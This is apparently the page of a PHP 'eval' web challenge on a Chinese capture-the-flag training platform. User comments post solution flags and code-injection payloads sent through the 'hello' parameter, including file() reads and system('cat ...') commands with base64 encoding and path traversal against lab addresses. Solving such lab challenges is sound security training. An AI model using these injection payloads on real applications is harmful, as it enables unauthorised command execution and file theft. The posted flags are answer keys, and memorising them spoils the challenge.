evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 16940
提  示:
描  述:
eval
评论
hhthht 2年前

flag{cea9de710e2926a7c49f12318caf3912}

回复 0

ryan777 2年前

根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')

回复 3

AmazingForself 2年前

看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539

回复 0

ryl123569 2年前

?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}

回复 0

xiaobaiermei 2年前

这里应该算的上是个文件包含吧

回复 0

17leaf 2年前

flag{4ccf17345bf8d8b3c5a6d005cf17e00a}

回复 0

cap 2年前

为啥我这样不行 ?hello=system("cat flag.php")

回复 0
Restwlaq 2年前

因为cat查看php的源码,经过var_dump还是字符串形式的代码,php中这样的代码还是被解析了,所以就看不到了。所以必须base64转一下,防止被执行。 ?hello=system(’cat flag.php | base64')

回复 0

你的宝 2年前

http://114.67.175.224:15626/?hello=file(%27flag.php%27)

回复 0

15056775319 2年前

http://114.67.175.224:17077/?hello=system('cat../../../../../../../../flag')

回复 0

dodobird 2年前

flag{6138fe804a171cd4cbfc9ea7cf1d1cd4}

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

wangheng 攻破了该题 24分钟前
19588971187 攻破了该题 3小时前
YangZoe 攻破了该题 3小时前
妈!有人打我 攻破了该题 5小时前
18970664307 攻破了该题 7小时前
bugkuxuzou 攻破了该题 7小时前
testda 攻破了该题 9小时前
satuo 攻破了该题 9小时前
goeasy 攻破了该题 14小时前
867736371 攻破了该题 14小时前
废柴小白 攻破了该题 14小时前
19893123836 攻破了该题 14小时前
tcg979 攻破了该题 1天前
AX渊仪 攻破了该题 1天前
qwerfsafafa 攻破了该题 1天前
太水了410410 攻破了该题 1天前
6145 攻破了该题 1天前
zer0_h 攻破了该题 1天前
Hehe0619 攻破了该题 1天前
李嘉欣a 攻破了该题 1天前
问题反馈